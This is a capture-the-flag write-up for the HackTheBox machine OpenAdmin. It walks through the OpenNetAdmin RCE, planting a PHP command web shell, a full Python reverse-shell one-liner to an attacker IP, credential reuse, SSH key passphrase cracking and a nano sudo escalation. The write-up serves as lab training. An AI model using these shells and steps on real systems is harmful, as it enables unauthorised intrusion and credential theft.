CTF-Writeups/HackTheBox/OpenAdmin.md
2021-07-19 00:44:38 +05:00

6.4 KiB

HackTheBox-OpenAdmin

NMAP

nmap -p- -sC -sV --min-rate 5000 IP

PORT      STATE    SERVICE      REASON         VERSION
22/tcp    open     ssh          syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                            
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VG
HiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNK
WaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2
tPAFPpvipRrLE=                                                            
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp    open     http         syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:        
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

PORT 80 (HTTP)

On the web server we only get apache default web page

I tried to see if it had something in robots.txt but that file didn't existed

So I decide to run gobuster to fuzz for files and directories

Going to music we can see a html template page , there's login link which takes us to OpenNetAdmin page which is an application for managing IP addresses DNS , subnets and etc also it exposes the version of openetadmmin which is 18.1.1

On googling for any exploits which are there for version 18.1.1 we can see a github repo having the PoC of remote code execution

https://github.com/amriunix/ona-rce

We can check through poc if the target is vulnerable or not

But when running the exploit it breaks

So I went to exploit-db and try that exploit

And this one worked perfectly

I tried getting a reverse shell again so that I can stabilize it but it wasn't working

I made a simple php file having a GET parameter named cmd which will be executed through system function which is used to execute shell commands and outputs the result , then I hosted this file using python3 and downloaded it on target machine using wget

Using python3 reverse shell I was able to get a proper shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Here I have just tried to stabilize the shell so we can have the ability to clear terminal screen also use bash history by using up and arrow down keys

We can go into /home directory to see how many users are there

There are 2 users but we can't navigate into to folders as www-data doesn't have permissions to view them. We can look for any cronjobs running through cat /etc/crontab

Nothing there, next we can look for open ports

Here we can see port 3306 which is for database , we can try to view the database password and see if it works on either one of the users

In /opt/ona/www/local/config we can see a database settings file

Let's try this password on jimmy

Perfect this worked !

But doing sudo -l failed the user was not allowed to use sudo I guess , so this user is in internal group maybe there's some folder we can look into

So looking into `index.php` we can see it's a login page which requires username and password and there's a condition if we provide the username as `jimmy` or provide the correct password which we could just decrpyt the sha512 hash , on decrypting it is `Revealed`

We can also see a php file main.php which is executing a shell command to read id_rsa key of joanna , if we try to run the php file we will get permission denied error as it's going to be executed as jimmy

If we look at the running ports on the machine we can see a port 52846

Using curl we can make a request on that port and it seems this is the same page that we saw in internal directory so this directory is being hosted on port 52846 this means we can naviagte to main.php file

I saved the request to main.php in a text file and transfered that file on my machine

On using the private key , it asks for a passphrase

Using ssh2john we can get the hash of id_rsa and crack it so we can get the passphrase

Now we have escalated to the second user , on running sudo -l we can see have permissions to run nano on /opt/priv

We can check the how to abuse nano from GTFOBINS

https://gtfobins.github.io/gtfobins/nano/